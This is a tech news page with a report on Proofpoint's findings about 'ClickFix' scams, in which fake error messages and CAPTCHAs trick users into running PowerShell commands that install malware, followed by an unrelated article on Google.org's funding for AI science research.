Image by wavebreakmedia_micro, from Freepik

Hackers Exploit ‘ClickFix’ Scams To Spread Malware

• Written by Kiara Fabbri Former Tech News Writer
• Fact-Checked by Sarah Frazier Former Content Manager

Hackers exploit “ClickFix” social engineering, tricking users with fake errors or CAPTCHA to execute PowerShell, spreading malware globally since 2024.

In a Rush? Here are the Quick Facts!

• ClickFix scams disguise as trusted services like Microsoft Word and Google Chrome.
• Fake CAPTCHA challenges are part of ClickFix, delivering malware like AsyncRAT and Lumma Stealer.
• ClickFix exploits users’ problem-solving instincts to bypass traditional security measures.

Cybercriminals are increasingly employing a sneaky social engineering tactic called “ClickFix” to distribute malware, targeting individuals’ instinct to troubleshoot problems on their own.

Research from Proofpoint has revealed on Monday the growing use of this method, which has been observed in numerous campaigns since March 2024.

The “ClickFix” technique relies on fake error messages displayed through pop-up dialog boxes. These messages appear legitimate and prompt users to fix an alleged issue themselves, explains Proofpoint.

Often, the instructions direct users to copy and paste a provided script into their computer’s PowerShell terminal, a tool used to execute commands on Windows systems. Unbeknownst to the user, this action downloads and runs malicious software.

Proofpoint has seen this approach used in phishing emails, malicious URLs, and compromised websites.

Threat actors disguise their scams as notifications from trusted sources like Microsoft Word, Google Chrome, and even local services tailored to specific industries, such as logistics or transportation.

A particularly devious variation of ClickFix incorporates fake CAPTCHA challenges, where users are asked to “prove they’re human,” explains Proofpoint.

The CAPTCHA trick is paired with instructions to execute malicious commands that install malware like AsyncRAT, DarkGate, or Lumma Stealer. Notably, a toolkit for this fake CAPTCHA tactic surfaced on GitHub, making it easier for criminals to use.

According to Proofpoint, Hackers have targeted a range of organizations globally, including government entities in Ukraine. In one instance, they impersonated GitHub, using fake security alerts to direct users to malicious websites.

These scams have led to malware infections in over 300 organizations.

What makes ClickFix so effective is its ability to bypass many security measures. Since users voluntarily execute the malicious commands, traditional email filters and anti-virus tools are less likely to flag the activity, says Proofpoint.

Proofpoint emphasizes that this tactic is part of a broader trend in hacking: manipulating human behavior rather than just exploiting technical vulnerabilities. Hackers rely on users’ willingness to solve problems independently, often bypassing IT teams in the process.

To counter this threat, organizations should educate employees about ClickFix scams, reinforcing the importance of skepticism toward unsolicited troubleshooting instructions.

Staying vigilant and reporting suspicious emails or pop-ups can help prevent falling victim to these crafty attacks.

Photo by Logan Gutierrez on Unsplash

Google Announces $20 Million In Funding For Scientific AI Research

• Written by Andrea Miliani Former Tech News Expert

Google announced $20 million in funding for AI scientific research yesterday during the inaugural AI for Science Forum, hosted by the Royal Society and Google DeepMind. The tech giant will also provide $2 million in cloud credits.

In a Rush? Here are the Quick Facts!

• Google.org announced $22 million in funding for AI scientific research
• The philanthropic organization wants to accelerate AI scientific breakthroughs across the globe
• A team will identify and announce the organizations that will get the financial support

The financial support will be provided by Google.org—the charitable arm of the tech giant—and allocated to non-profit and academic organizations globally that are currently using AI to address complex problems across multiple fields of science.

“We’ll work with leaders internally across our Google DeepMind, Google Research and other AI-focused teams as well as external experts to identify and announce organizations,” states the announcement shared on Google’s blog.

With this new funding, Google.org is focusing on supporting the next AI scientific breakthroughs and is interested in research and investigations related to topics like sustainability, experimental biology, neglected disease research, and materials science.

The tech giant also announced $2 million in Google Cloud Credits as well as pro bono technical expertise from the company’s workers. This new funding adds to the more than $200 million the company has provided to accelerate scientific work.

The company highlighted this year’s Nobel Award in Chemistry, awarded to Demis Hassabis and John Jumper for the advanced AI program AlphaFold developed by Google DeepMind, currently being used by over 2 million researchers around the world for different purposes including Parkinson’s treatment and the fight against malaria.

This year’s Nobel Prize in Physics was awarded to John J. Hopfield and Geoffrey E. Hinton—a former Google employee.

Other tech giants have been supporting AI developments in science. A few days ago, AWS announced it will provide up to $110 million in credits for scientific researchers to access its cloud data centers.